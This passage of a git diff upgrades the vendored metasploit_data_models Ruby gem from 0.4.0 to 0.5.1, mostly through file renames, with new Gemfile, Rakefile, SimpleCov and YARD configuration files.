metasploit_data_models-0.5.1}/script/rails (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/assets/javascripts/application.js (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/assets/stylesheets/application.css (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/controllers/application_controller.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/helpers/application_helper.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/mailers/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/models/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/app/views/layouts/application.html.erb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config.ru (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/application.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/boot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/database.yml.example (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environment.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/development.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/production.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/environments/test.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/backtrace_silencers.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/inflections.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/mime_types.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/secret_token.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/session_store.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/initializers/wrap_parameters.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/config/routes.rb (100%) create mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/lib/assets/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/log/.gitkeep (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/404.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/422.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/500.html (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/public/favicon.ico (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/dummy/script/rails (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/lib/base64_serializer_spec.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.4.0 => metasploit_data_models-0.5.1}/spec/spec_helper.rb (96%) rename lib/gemcache/ruby/1.9.1/specifications/{metasploit_data_models-0.3.0.gemspec => metasploit_data_models-0.5.1.gemspec} (72%) diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile deleted file mode 100755 index b72e01d066..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Gemfile +++ /dev/null @@ -1,10 +0,0 @@ -source "http://rubygems.org" - -# Specify your gem's dependencies in metasploit_data_models.gemspec -gemspec - -group :test do - # rails is only used for testing with a dummy application in spec/dummy - gem 'rails' - gem 'rspec-rails' -end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile deleted file mode 100755 index ccea92f08e..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/Rakefile +++ /dev/null @@ -1,7 +0,0 @@ -require 'bundler/gem_tasks' -require 'rspec/core/rake_task' - -RSpec::Core::RakeTask.new(:spec) - -task :default => :spec - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb deleted file mode 100755 index 3d938d3ef9..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_vuln.rb +++ /dev/null @@ -1,16 +0,0 @@ -class Mdm::WebVuln < ActiveRecord::Base - # - # Relations - # - - belongs_to :web_site, :class_name => 'Mdm::WebSite' - - # - # Serializations - # - - serialize :params, MetasploitDataModels::Base64Serializer.new - - ActiveSupport.run_load_hooks(:mdm_web_vuln, self) -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb deleted file mode 100755 index cf7d89cc68..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/version.rb +++ /dev/null @@ -1,7 +0,0 @@ -module MetasploitDataModels - # MetasploitDataModels follows the {Semantic Versioning Specification http://semver.org/}. At this time, the API - # is considered unstable because the database migrations are still in metasploit-framework and certain models may not - # be shared between metasploit-framework and pro, so models may be removed in the future. Because of the unstable API - # the version should remain below 1.0.0 - VERSION = '0.4.0' -end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore similarity index 78% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore index e5b2a024e4..9cf3f2824c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.gitignore +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore @@ -6,13 +6,19 @@ *.gem # Rubymine project configuration .idea +# logs +*.log # Don't check in rvmrc since this is a gem .rvmrc +# YARD database +.yardoc +# coverage report directory for simplecov/Rubymine +coverage +# generated yardocs +doc # Installed gem versions. Not stored for the same reasons as .rvmrc Gemfile.lock # Packaging directory for builds pkg/* # Database configuration (with passwords) for specs spec/dummy/config/database.yml -# logs -*.log diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/.rspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov new file mode 100644 index 0000000000..c46d9aaf94 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov @@ -0,0 +1,38 @@ +# RM_INFO is set when using Rubymine. In Rubymine, starting SimpleCov is +# controlled by running with coverage, so don't explicitly start coverage (and +# therefore generate a report) when in Rubymine. This _will_ generate a report +# whenever `rake spec` is run. +unless ENV['RM_INFO'] + SimpleCov.start +end + +SimpleCov.configure do + load_adapter('rails') + + # ignore this file + add_filter '.simplecov' + + # + # Changed Files in Git Group + # @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only + # + + untracked = `git ls-files --exclude-standard --others` + unstaged = `git diff --name-only` + staged = `git diff --name-only --cached` + all = untracked + unstaged + staged + changed_filenames = all.split("\n") + + add_group 'Changed' do |source_file| + changed_filenames.detect { |changed_filename| + source_file.filename.end_with?(changed_filename) + } + end + + # + # Specs are reported on to ensure that all examples are being run and all + # lets, befores, afters, etc are being used. + # + + add_group 'Specs', 'spec' +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts new file mode 100644 index 0000000000..5d51dac244 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts @@ -0,0 +1,4 @@ +--markup markdown +--protected +{app,lib}/**/*.rb +db/migrate/*.rb \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile new file mode 100755 index 0000000000..c4e6b487cb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile @@ -0,0 +1,22 @@ +source "http://rubygems.org" + +# Specify your gem's dependencies in metasploit_data_models.gemspec +gemspec + +# used by dummy application +group :development, :test do + # supplies factories for producing model instance for specs + gem 'factory_girl_rails' + # rails is only used for the dummy application in spec/dummy + gem 'rails' +end + +group :test do + # In a full rails project, factory_girl_rails would be in both the :development, and :test group, but since we only + # want rails in :test, factory_girl_rails must also only be in :test. + # add matchers from shoulda, such as validates_presence_of, which are useful for testing validations + gem 'shoulda-matchers' + # code coverage of tests + gem 'simplecov', :require => false + gem 'rspec-rails' +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/LICENSE rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/README.md rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile new file mode 100755 index 0000000000..b582299d61 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile @@ -0,0 +1,20 @@ +#!/usr/bin/env rake +begin + require 'bundler/setup' +rescue LoadError + puts 'You must `gem install bundler` and `bundle install` to run rake tasks' +end + + +APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__) +load 'rails/tasks/engine.rake' + +Bundler::GemHelper.install_tasks + +require 'rspec/core/rake_task' + +RSpec::Core::RakeTask.new(:spec) +task :default => :spec + +load 'lib/tasks/yard.rake' + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/api_key.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/client.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploit_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/exploited_host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/host_tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/imported_cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/listener.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/loot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/macro.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/mod_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_action.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_arch.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_author.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_mixin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_platform.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/module_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/nexpose_console.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/note.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb rename to 